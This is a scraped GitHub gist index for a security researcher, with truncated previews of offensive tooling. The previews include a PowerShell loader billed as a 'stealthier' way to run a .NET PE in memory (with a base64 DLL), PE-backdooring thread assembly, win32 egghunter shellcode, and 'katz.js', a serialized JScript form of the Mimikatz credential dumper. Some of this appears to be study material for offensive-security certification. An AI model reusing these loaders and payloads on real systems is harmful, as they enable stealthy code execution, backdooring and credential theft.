I hereby claim:
- I am tophertimzen on github.
- I am ttimzen (https://keybase.io/ttimzen) on keybase.
- I have a public key ASDujVwoiebsWPA5e5Xk4wd9blw29002bROa67GXKNbZ5Qo
To claim this, I am signing this object:
Topher Timzen tophertimzen
tophertimzen
/ LoadInMemoryModule.ps1
Created
March 30, 2018 23:55
— forked from mattifestation/LoadInMemoryModule.ps1
A stealthier method of loading a .NET PE in memory - via the Assembly.LoadModule method
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Domain = [AppDomain]::CurrentDomain | |
| $DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly') | |
| $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) | |
| $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule') | |
| # Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into. | |
| $ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll') | |
| $TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public) | |
| $TypeBuilder.CreateType() | |
| $HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA |
tophertimzen
/ CreateThread.asm
Last active
June 14, 2022 00:45
Make a new Thread with Windows PEB -> Function Hash Resolver
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; Topher Timzen | |
| ; Messing around with PE backdooring for CTP/OSCE and wanted to make a new thread inside of process to avoid synchronization issues. | |
| ; Tons of NULL as I used this in a PE directly, no need to avoid them. | |
| ; nasm CreateThread.asm -o CreateThread.raw; xxd -p CreateThread.raw | tr -d '\n' | |
| [BITS 32] | |
| [SECTION .text] | |
| global _start |
tophertimzen
/ HeapWalker.py
Created
November 16, 2017 04:57
— forked from debasishm89/HeapWalker.py
HeapWalker - Walking Windows 7 process heaps using pydbg
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| HeapWalker - Walking Windows 7 process heaps using pydbg | |
| Author : Debasish Mandal | |
| Blog :http://www.debasish.in/ | |
| Twitter : https://twitter.com/debasishm89 | |
| Description : This python script is simplest implementation of Windows HeapWalk() API. | |
| It uses pydbg and allows user to Walk Through debugee process's heaps on the fly. |
tophertimzen
/ omelette_egghunter_win
Created
November 3, 2017 16:55
— forked from luca-m/omelette_egghunter_win
egghunt shellcode for win32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Optimized egghunt shellcode for win32 (32 bytes) | |
| * | |
| * Credits: http://www.hick.org/~mmiller/shellcode/win32/egghunt_syscall.c | |
| * | |
| * Description | |
| * | |
| * This code works by abusing an NT syscall (NtAccessCheckAndAuditAlaram) | |
| * whereby it uses the kernel to validate whether or not a set of addresses | |
| * is valid, and, if it is, whether or not they match the 8 byte egg we're |
tophertimzen
/ katz.js
Created
October 30, 2017 21:03
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var serialized_obj = [ | |
| 0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108, | |
| 101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108, | |
| 101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46, | |
| 68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101, | |
| 103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105, | |
| 122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77, | |
| 101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0, |
tophertimzen
/ IntPtrToObject
Created
June 12, 2015 17:53
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public static object GetInstance(IntPtr ptrIN) | |
| { | |
| object refer = ptrIN.GetType(); | |
| IntPtr pointer = ptrIN; | |
| unsafe | |
| { | |
| *(&pointer - 1) = *(&pointer); | |
| } | |
| return refer; | |
| } |
tophertimzen
/ ManagedHeapLocation
Created
June 12, 2015 17:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public static IntPtr getObjectAddr(object wantedObject) | |
| { | |
| IntPtr objectPointer = (IntPtr)5; | |
| Unsafe | |
| { | |
| return objectPointer = *(&objectPointer - 3); | |
| } | |
| } |
tophertimzen
/ ConstructAnObject
Created
June 12, 2015 17:49
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Type reference = typeof(GrayFrost.testClass); | |
| ConstructorInfo ctor = reference.GetConstructor (Type.EmptyTypes); | |
| object wantedObject = ctor.Invoke(new object[]{}); |